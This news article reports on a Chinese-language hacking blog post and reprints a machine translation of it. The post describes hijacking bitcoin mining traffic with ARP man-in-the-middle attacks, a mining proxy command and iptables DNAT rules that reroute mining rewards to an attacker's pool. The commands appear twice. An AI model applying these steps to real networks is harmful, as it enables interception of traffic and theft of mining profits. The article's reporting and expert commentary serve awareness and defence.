Chinese Deep Web Sites Explains How To Hijack Mining Profits

A Chinese-language hacking blog in the deep web has described a technique that could theoretically reroute mining rewards to the hacker’s account.

The post was found on a Chinese-language hacking blog, linked by a popular deep web wiki/site lister. It appears to describe a technique in which the hacker would use already installed viruses and trojans to reroute packing data to a different pool, using man in the middle attacks. The post claims that there would be little to no evidence that something had gone wrong.

While we have not confirmed that this potential malware is out in the wild, or has even been developed beyond just the concept stage, it isn’t hard to imagine how concerning the effects could be. Since the hacker would have complete control of the packet data, it could be difficult to detect the negative effects of this malware. Potentially, the hacker could continue to pass on some rewards to the miners while keeping some for him or herself. It may be difficult to notice any drop in production since mining success depends largely on luck. Overtime, a miner could become suspicious after consistently low mining success for the rig’s stated hashing power, but by then the nefarious party would have already gotten away with some bitcoin.

Potentially, it could bleed a massive mining operation dry, eating into the already razor thin profit margins gained by mining.

The attack requires a pre-installed trojan and the ability to modify IP tables. If a criminal has that kind of access, he or she would be able to perform much more damaging acts than simply rerouting mining profits, but this new method seems novel in its potential to fly below the radar.

We have consulted a few experts, including Bitcoin security consultant and early mining operator Blake Anderson as well as Spencer Liven of Sterlingcoin about the plausibility of such an attack and we were informed that the attack certainly seems possible with Anderson stating that “The security vulnerability [the post] references [are] Trojans and man in the middle attack[s]. If you assume both of those vulnerabilities, virtually anything becomes possible.”

The below is a google translate version of the post, unedited other than the removal of an unimportant introduction. An untranslated version of the complete post, including the introduction, can be found below the translation, we welcome any improved translations by readers.

This blog ready to introduce BTC mining machine network packet hijacking, once taken to the mining machine packet, the packet will be able to tamper with the contents of the ore mining machine that points to another pool: all this does not need to modify the mining machine configuration file so the owner of the mining machine mining machine page is not unusual, the only mine operators found Ikegami force reduction.

First, you need to give all network packets mining machine M have been attacked machine A (assume that IP is 1) If the M and A have public network IP, we need to attack the M implanted Trojans; this blog is temporarily not discuss this topic. 2) If the M and A in the same local area network, and A is not a gateway, you need M launch ARP middleman attacks, all of the M packet forwarding via A. 3) If the M and A in the same local area network, and A is a gateway, that network administrators to attack, then this is the most convenient situation, can hijack packets.

The basic idea of hijacking is: First open a mining_proxy on A, ensure mining_proxy properly connected to the mine pool, then the M’s mining request is forwarded to all A’s minig_proxy. Suppose that M’s IP is, IP A is, the IP gateway G is (ARP middleman attacks after the completion of the gateway IP is not important). Specific steps are as follows:

1) Start mining_proxy on A
mining_proxy -o pool -p port -sh -sp 3333 -oh -gp 3334 -cu user -cp pass
Specific parameters can refer mining_proxy, where stratum agreement listen 3333 port.

2) iptables packet hijacking
Reference iptables process flowchart here. Under normal circumstances, mining packet is taking the rightmost path, that PREROUTING chain -> FORWARD chain -> POSTROUTING chain. Packet hijacking after taking the middle and the left path, which PREROUTING chain -> INPUT chain -> local process handling (ie mining_proxy) -> OUTPUT chain -> POSTROUTING chain.

Firstly PREROUTING chain, modify the destination address for inbound packets:
iptables -t nat -A PREROUTING -m tcp -dport 3333 -j DNAT -to-destination
iptables -t nat -A PREROUTING -m tcp -dport 3334 -j DNAT -to-destination
Here DNAT 3333 and 3334 the two ports, because most of the mine pool uses these two ports

Then open the firewall on port 3333 A:
iptables -A INPUT -m tcp -dport 3333 -j ACCEPT

Finally POSTROUTING chain, to return data for camouflage:
iptables -t nat -A POSTROUTING -j MASQUERADE
Can not guarantee that mine pool address mining machine M points unchanged (mine chance to change mine pool, pool with a mine have multiple IP), it returns the data can not be used SNAT, only use the MASQUERADE

At this point, the entire process has been completed hijacking. Now you should see the mining_proxy share the information submitted by the mining machine, while mine pointed mining_proxy pool will start to count the force.

新年嘛,要有点新变化。我想了想,觉得这个博客也不需要完全局限在一个主题之下,所以今年的博文的内容涉及面会更丰富一些,比如今天这篇博文就是关于黑客技术的。我这个博客准备长期开下去,因此也不排除在未来我接触到毒品和武器之后分享这方面内容的可能性。无论怎样,这个博客里分享的内容都是我个人的经历,或者至少是我觉得合理的方法,所以具有一定可行性。但这样的劣势是内容涉及的范围有限,你可能找不到你想要的信息,比如ATM取款等 physical carding 的信息。对于寻找这类信息的朋友,我只能实话实说:我这个博客可能对你的帮助不大,至少在我接触这些内容之前我无法提供任何信息。




mining_proxy -o pool -p port -sh -sp 3333 -oh -gp 3334 -cu user -cp pass


iptables -t nat -A PREROUTING -m tcp –dport 3333 -j DNAT –to-destination
iptables -t nat -A PREROUTING -m tcp –dport 3334 -j DNAT –to-destination

iptables -A INPUT -m tcp –dport 3333 -j ACCEPT

iptables -t nat -A POSTROUTING -j MASQUERADE


This sort of attack doesn’t represent any kind of vulnerability of the Bitcoin network. It does, however, illustrate that attacks are evolving with ever-more complex tactics. We will keep an eye out for more novel attacks on mining and bitcoin in general. In the meantime, mining operators are suggested to always use the most stringent security measures. Any other media outlets or security research firms are welcome to contact me for more info at [email protected]

Leave a Comment

Your email address will not be published. Required fields are marked *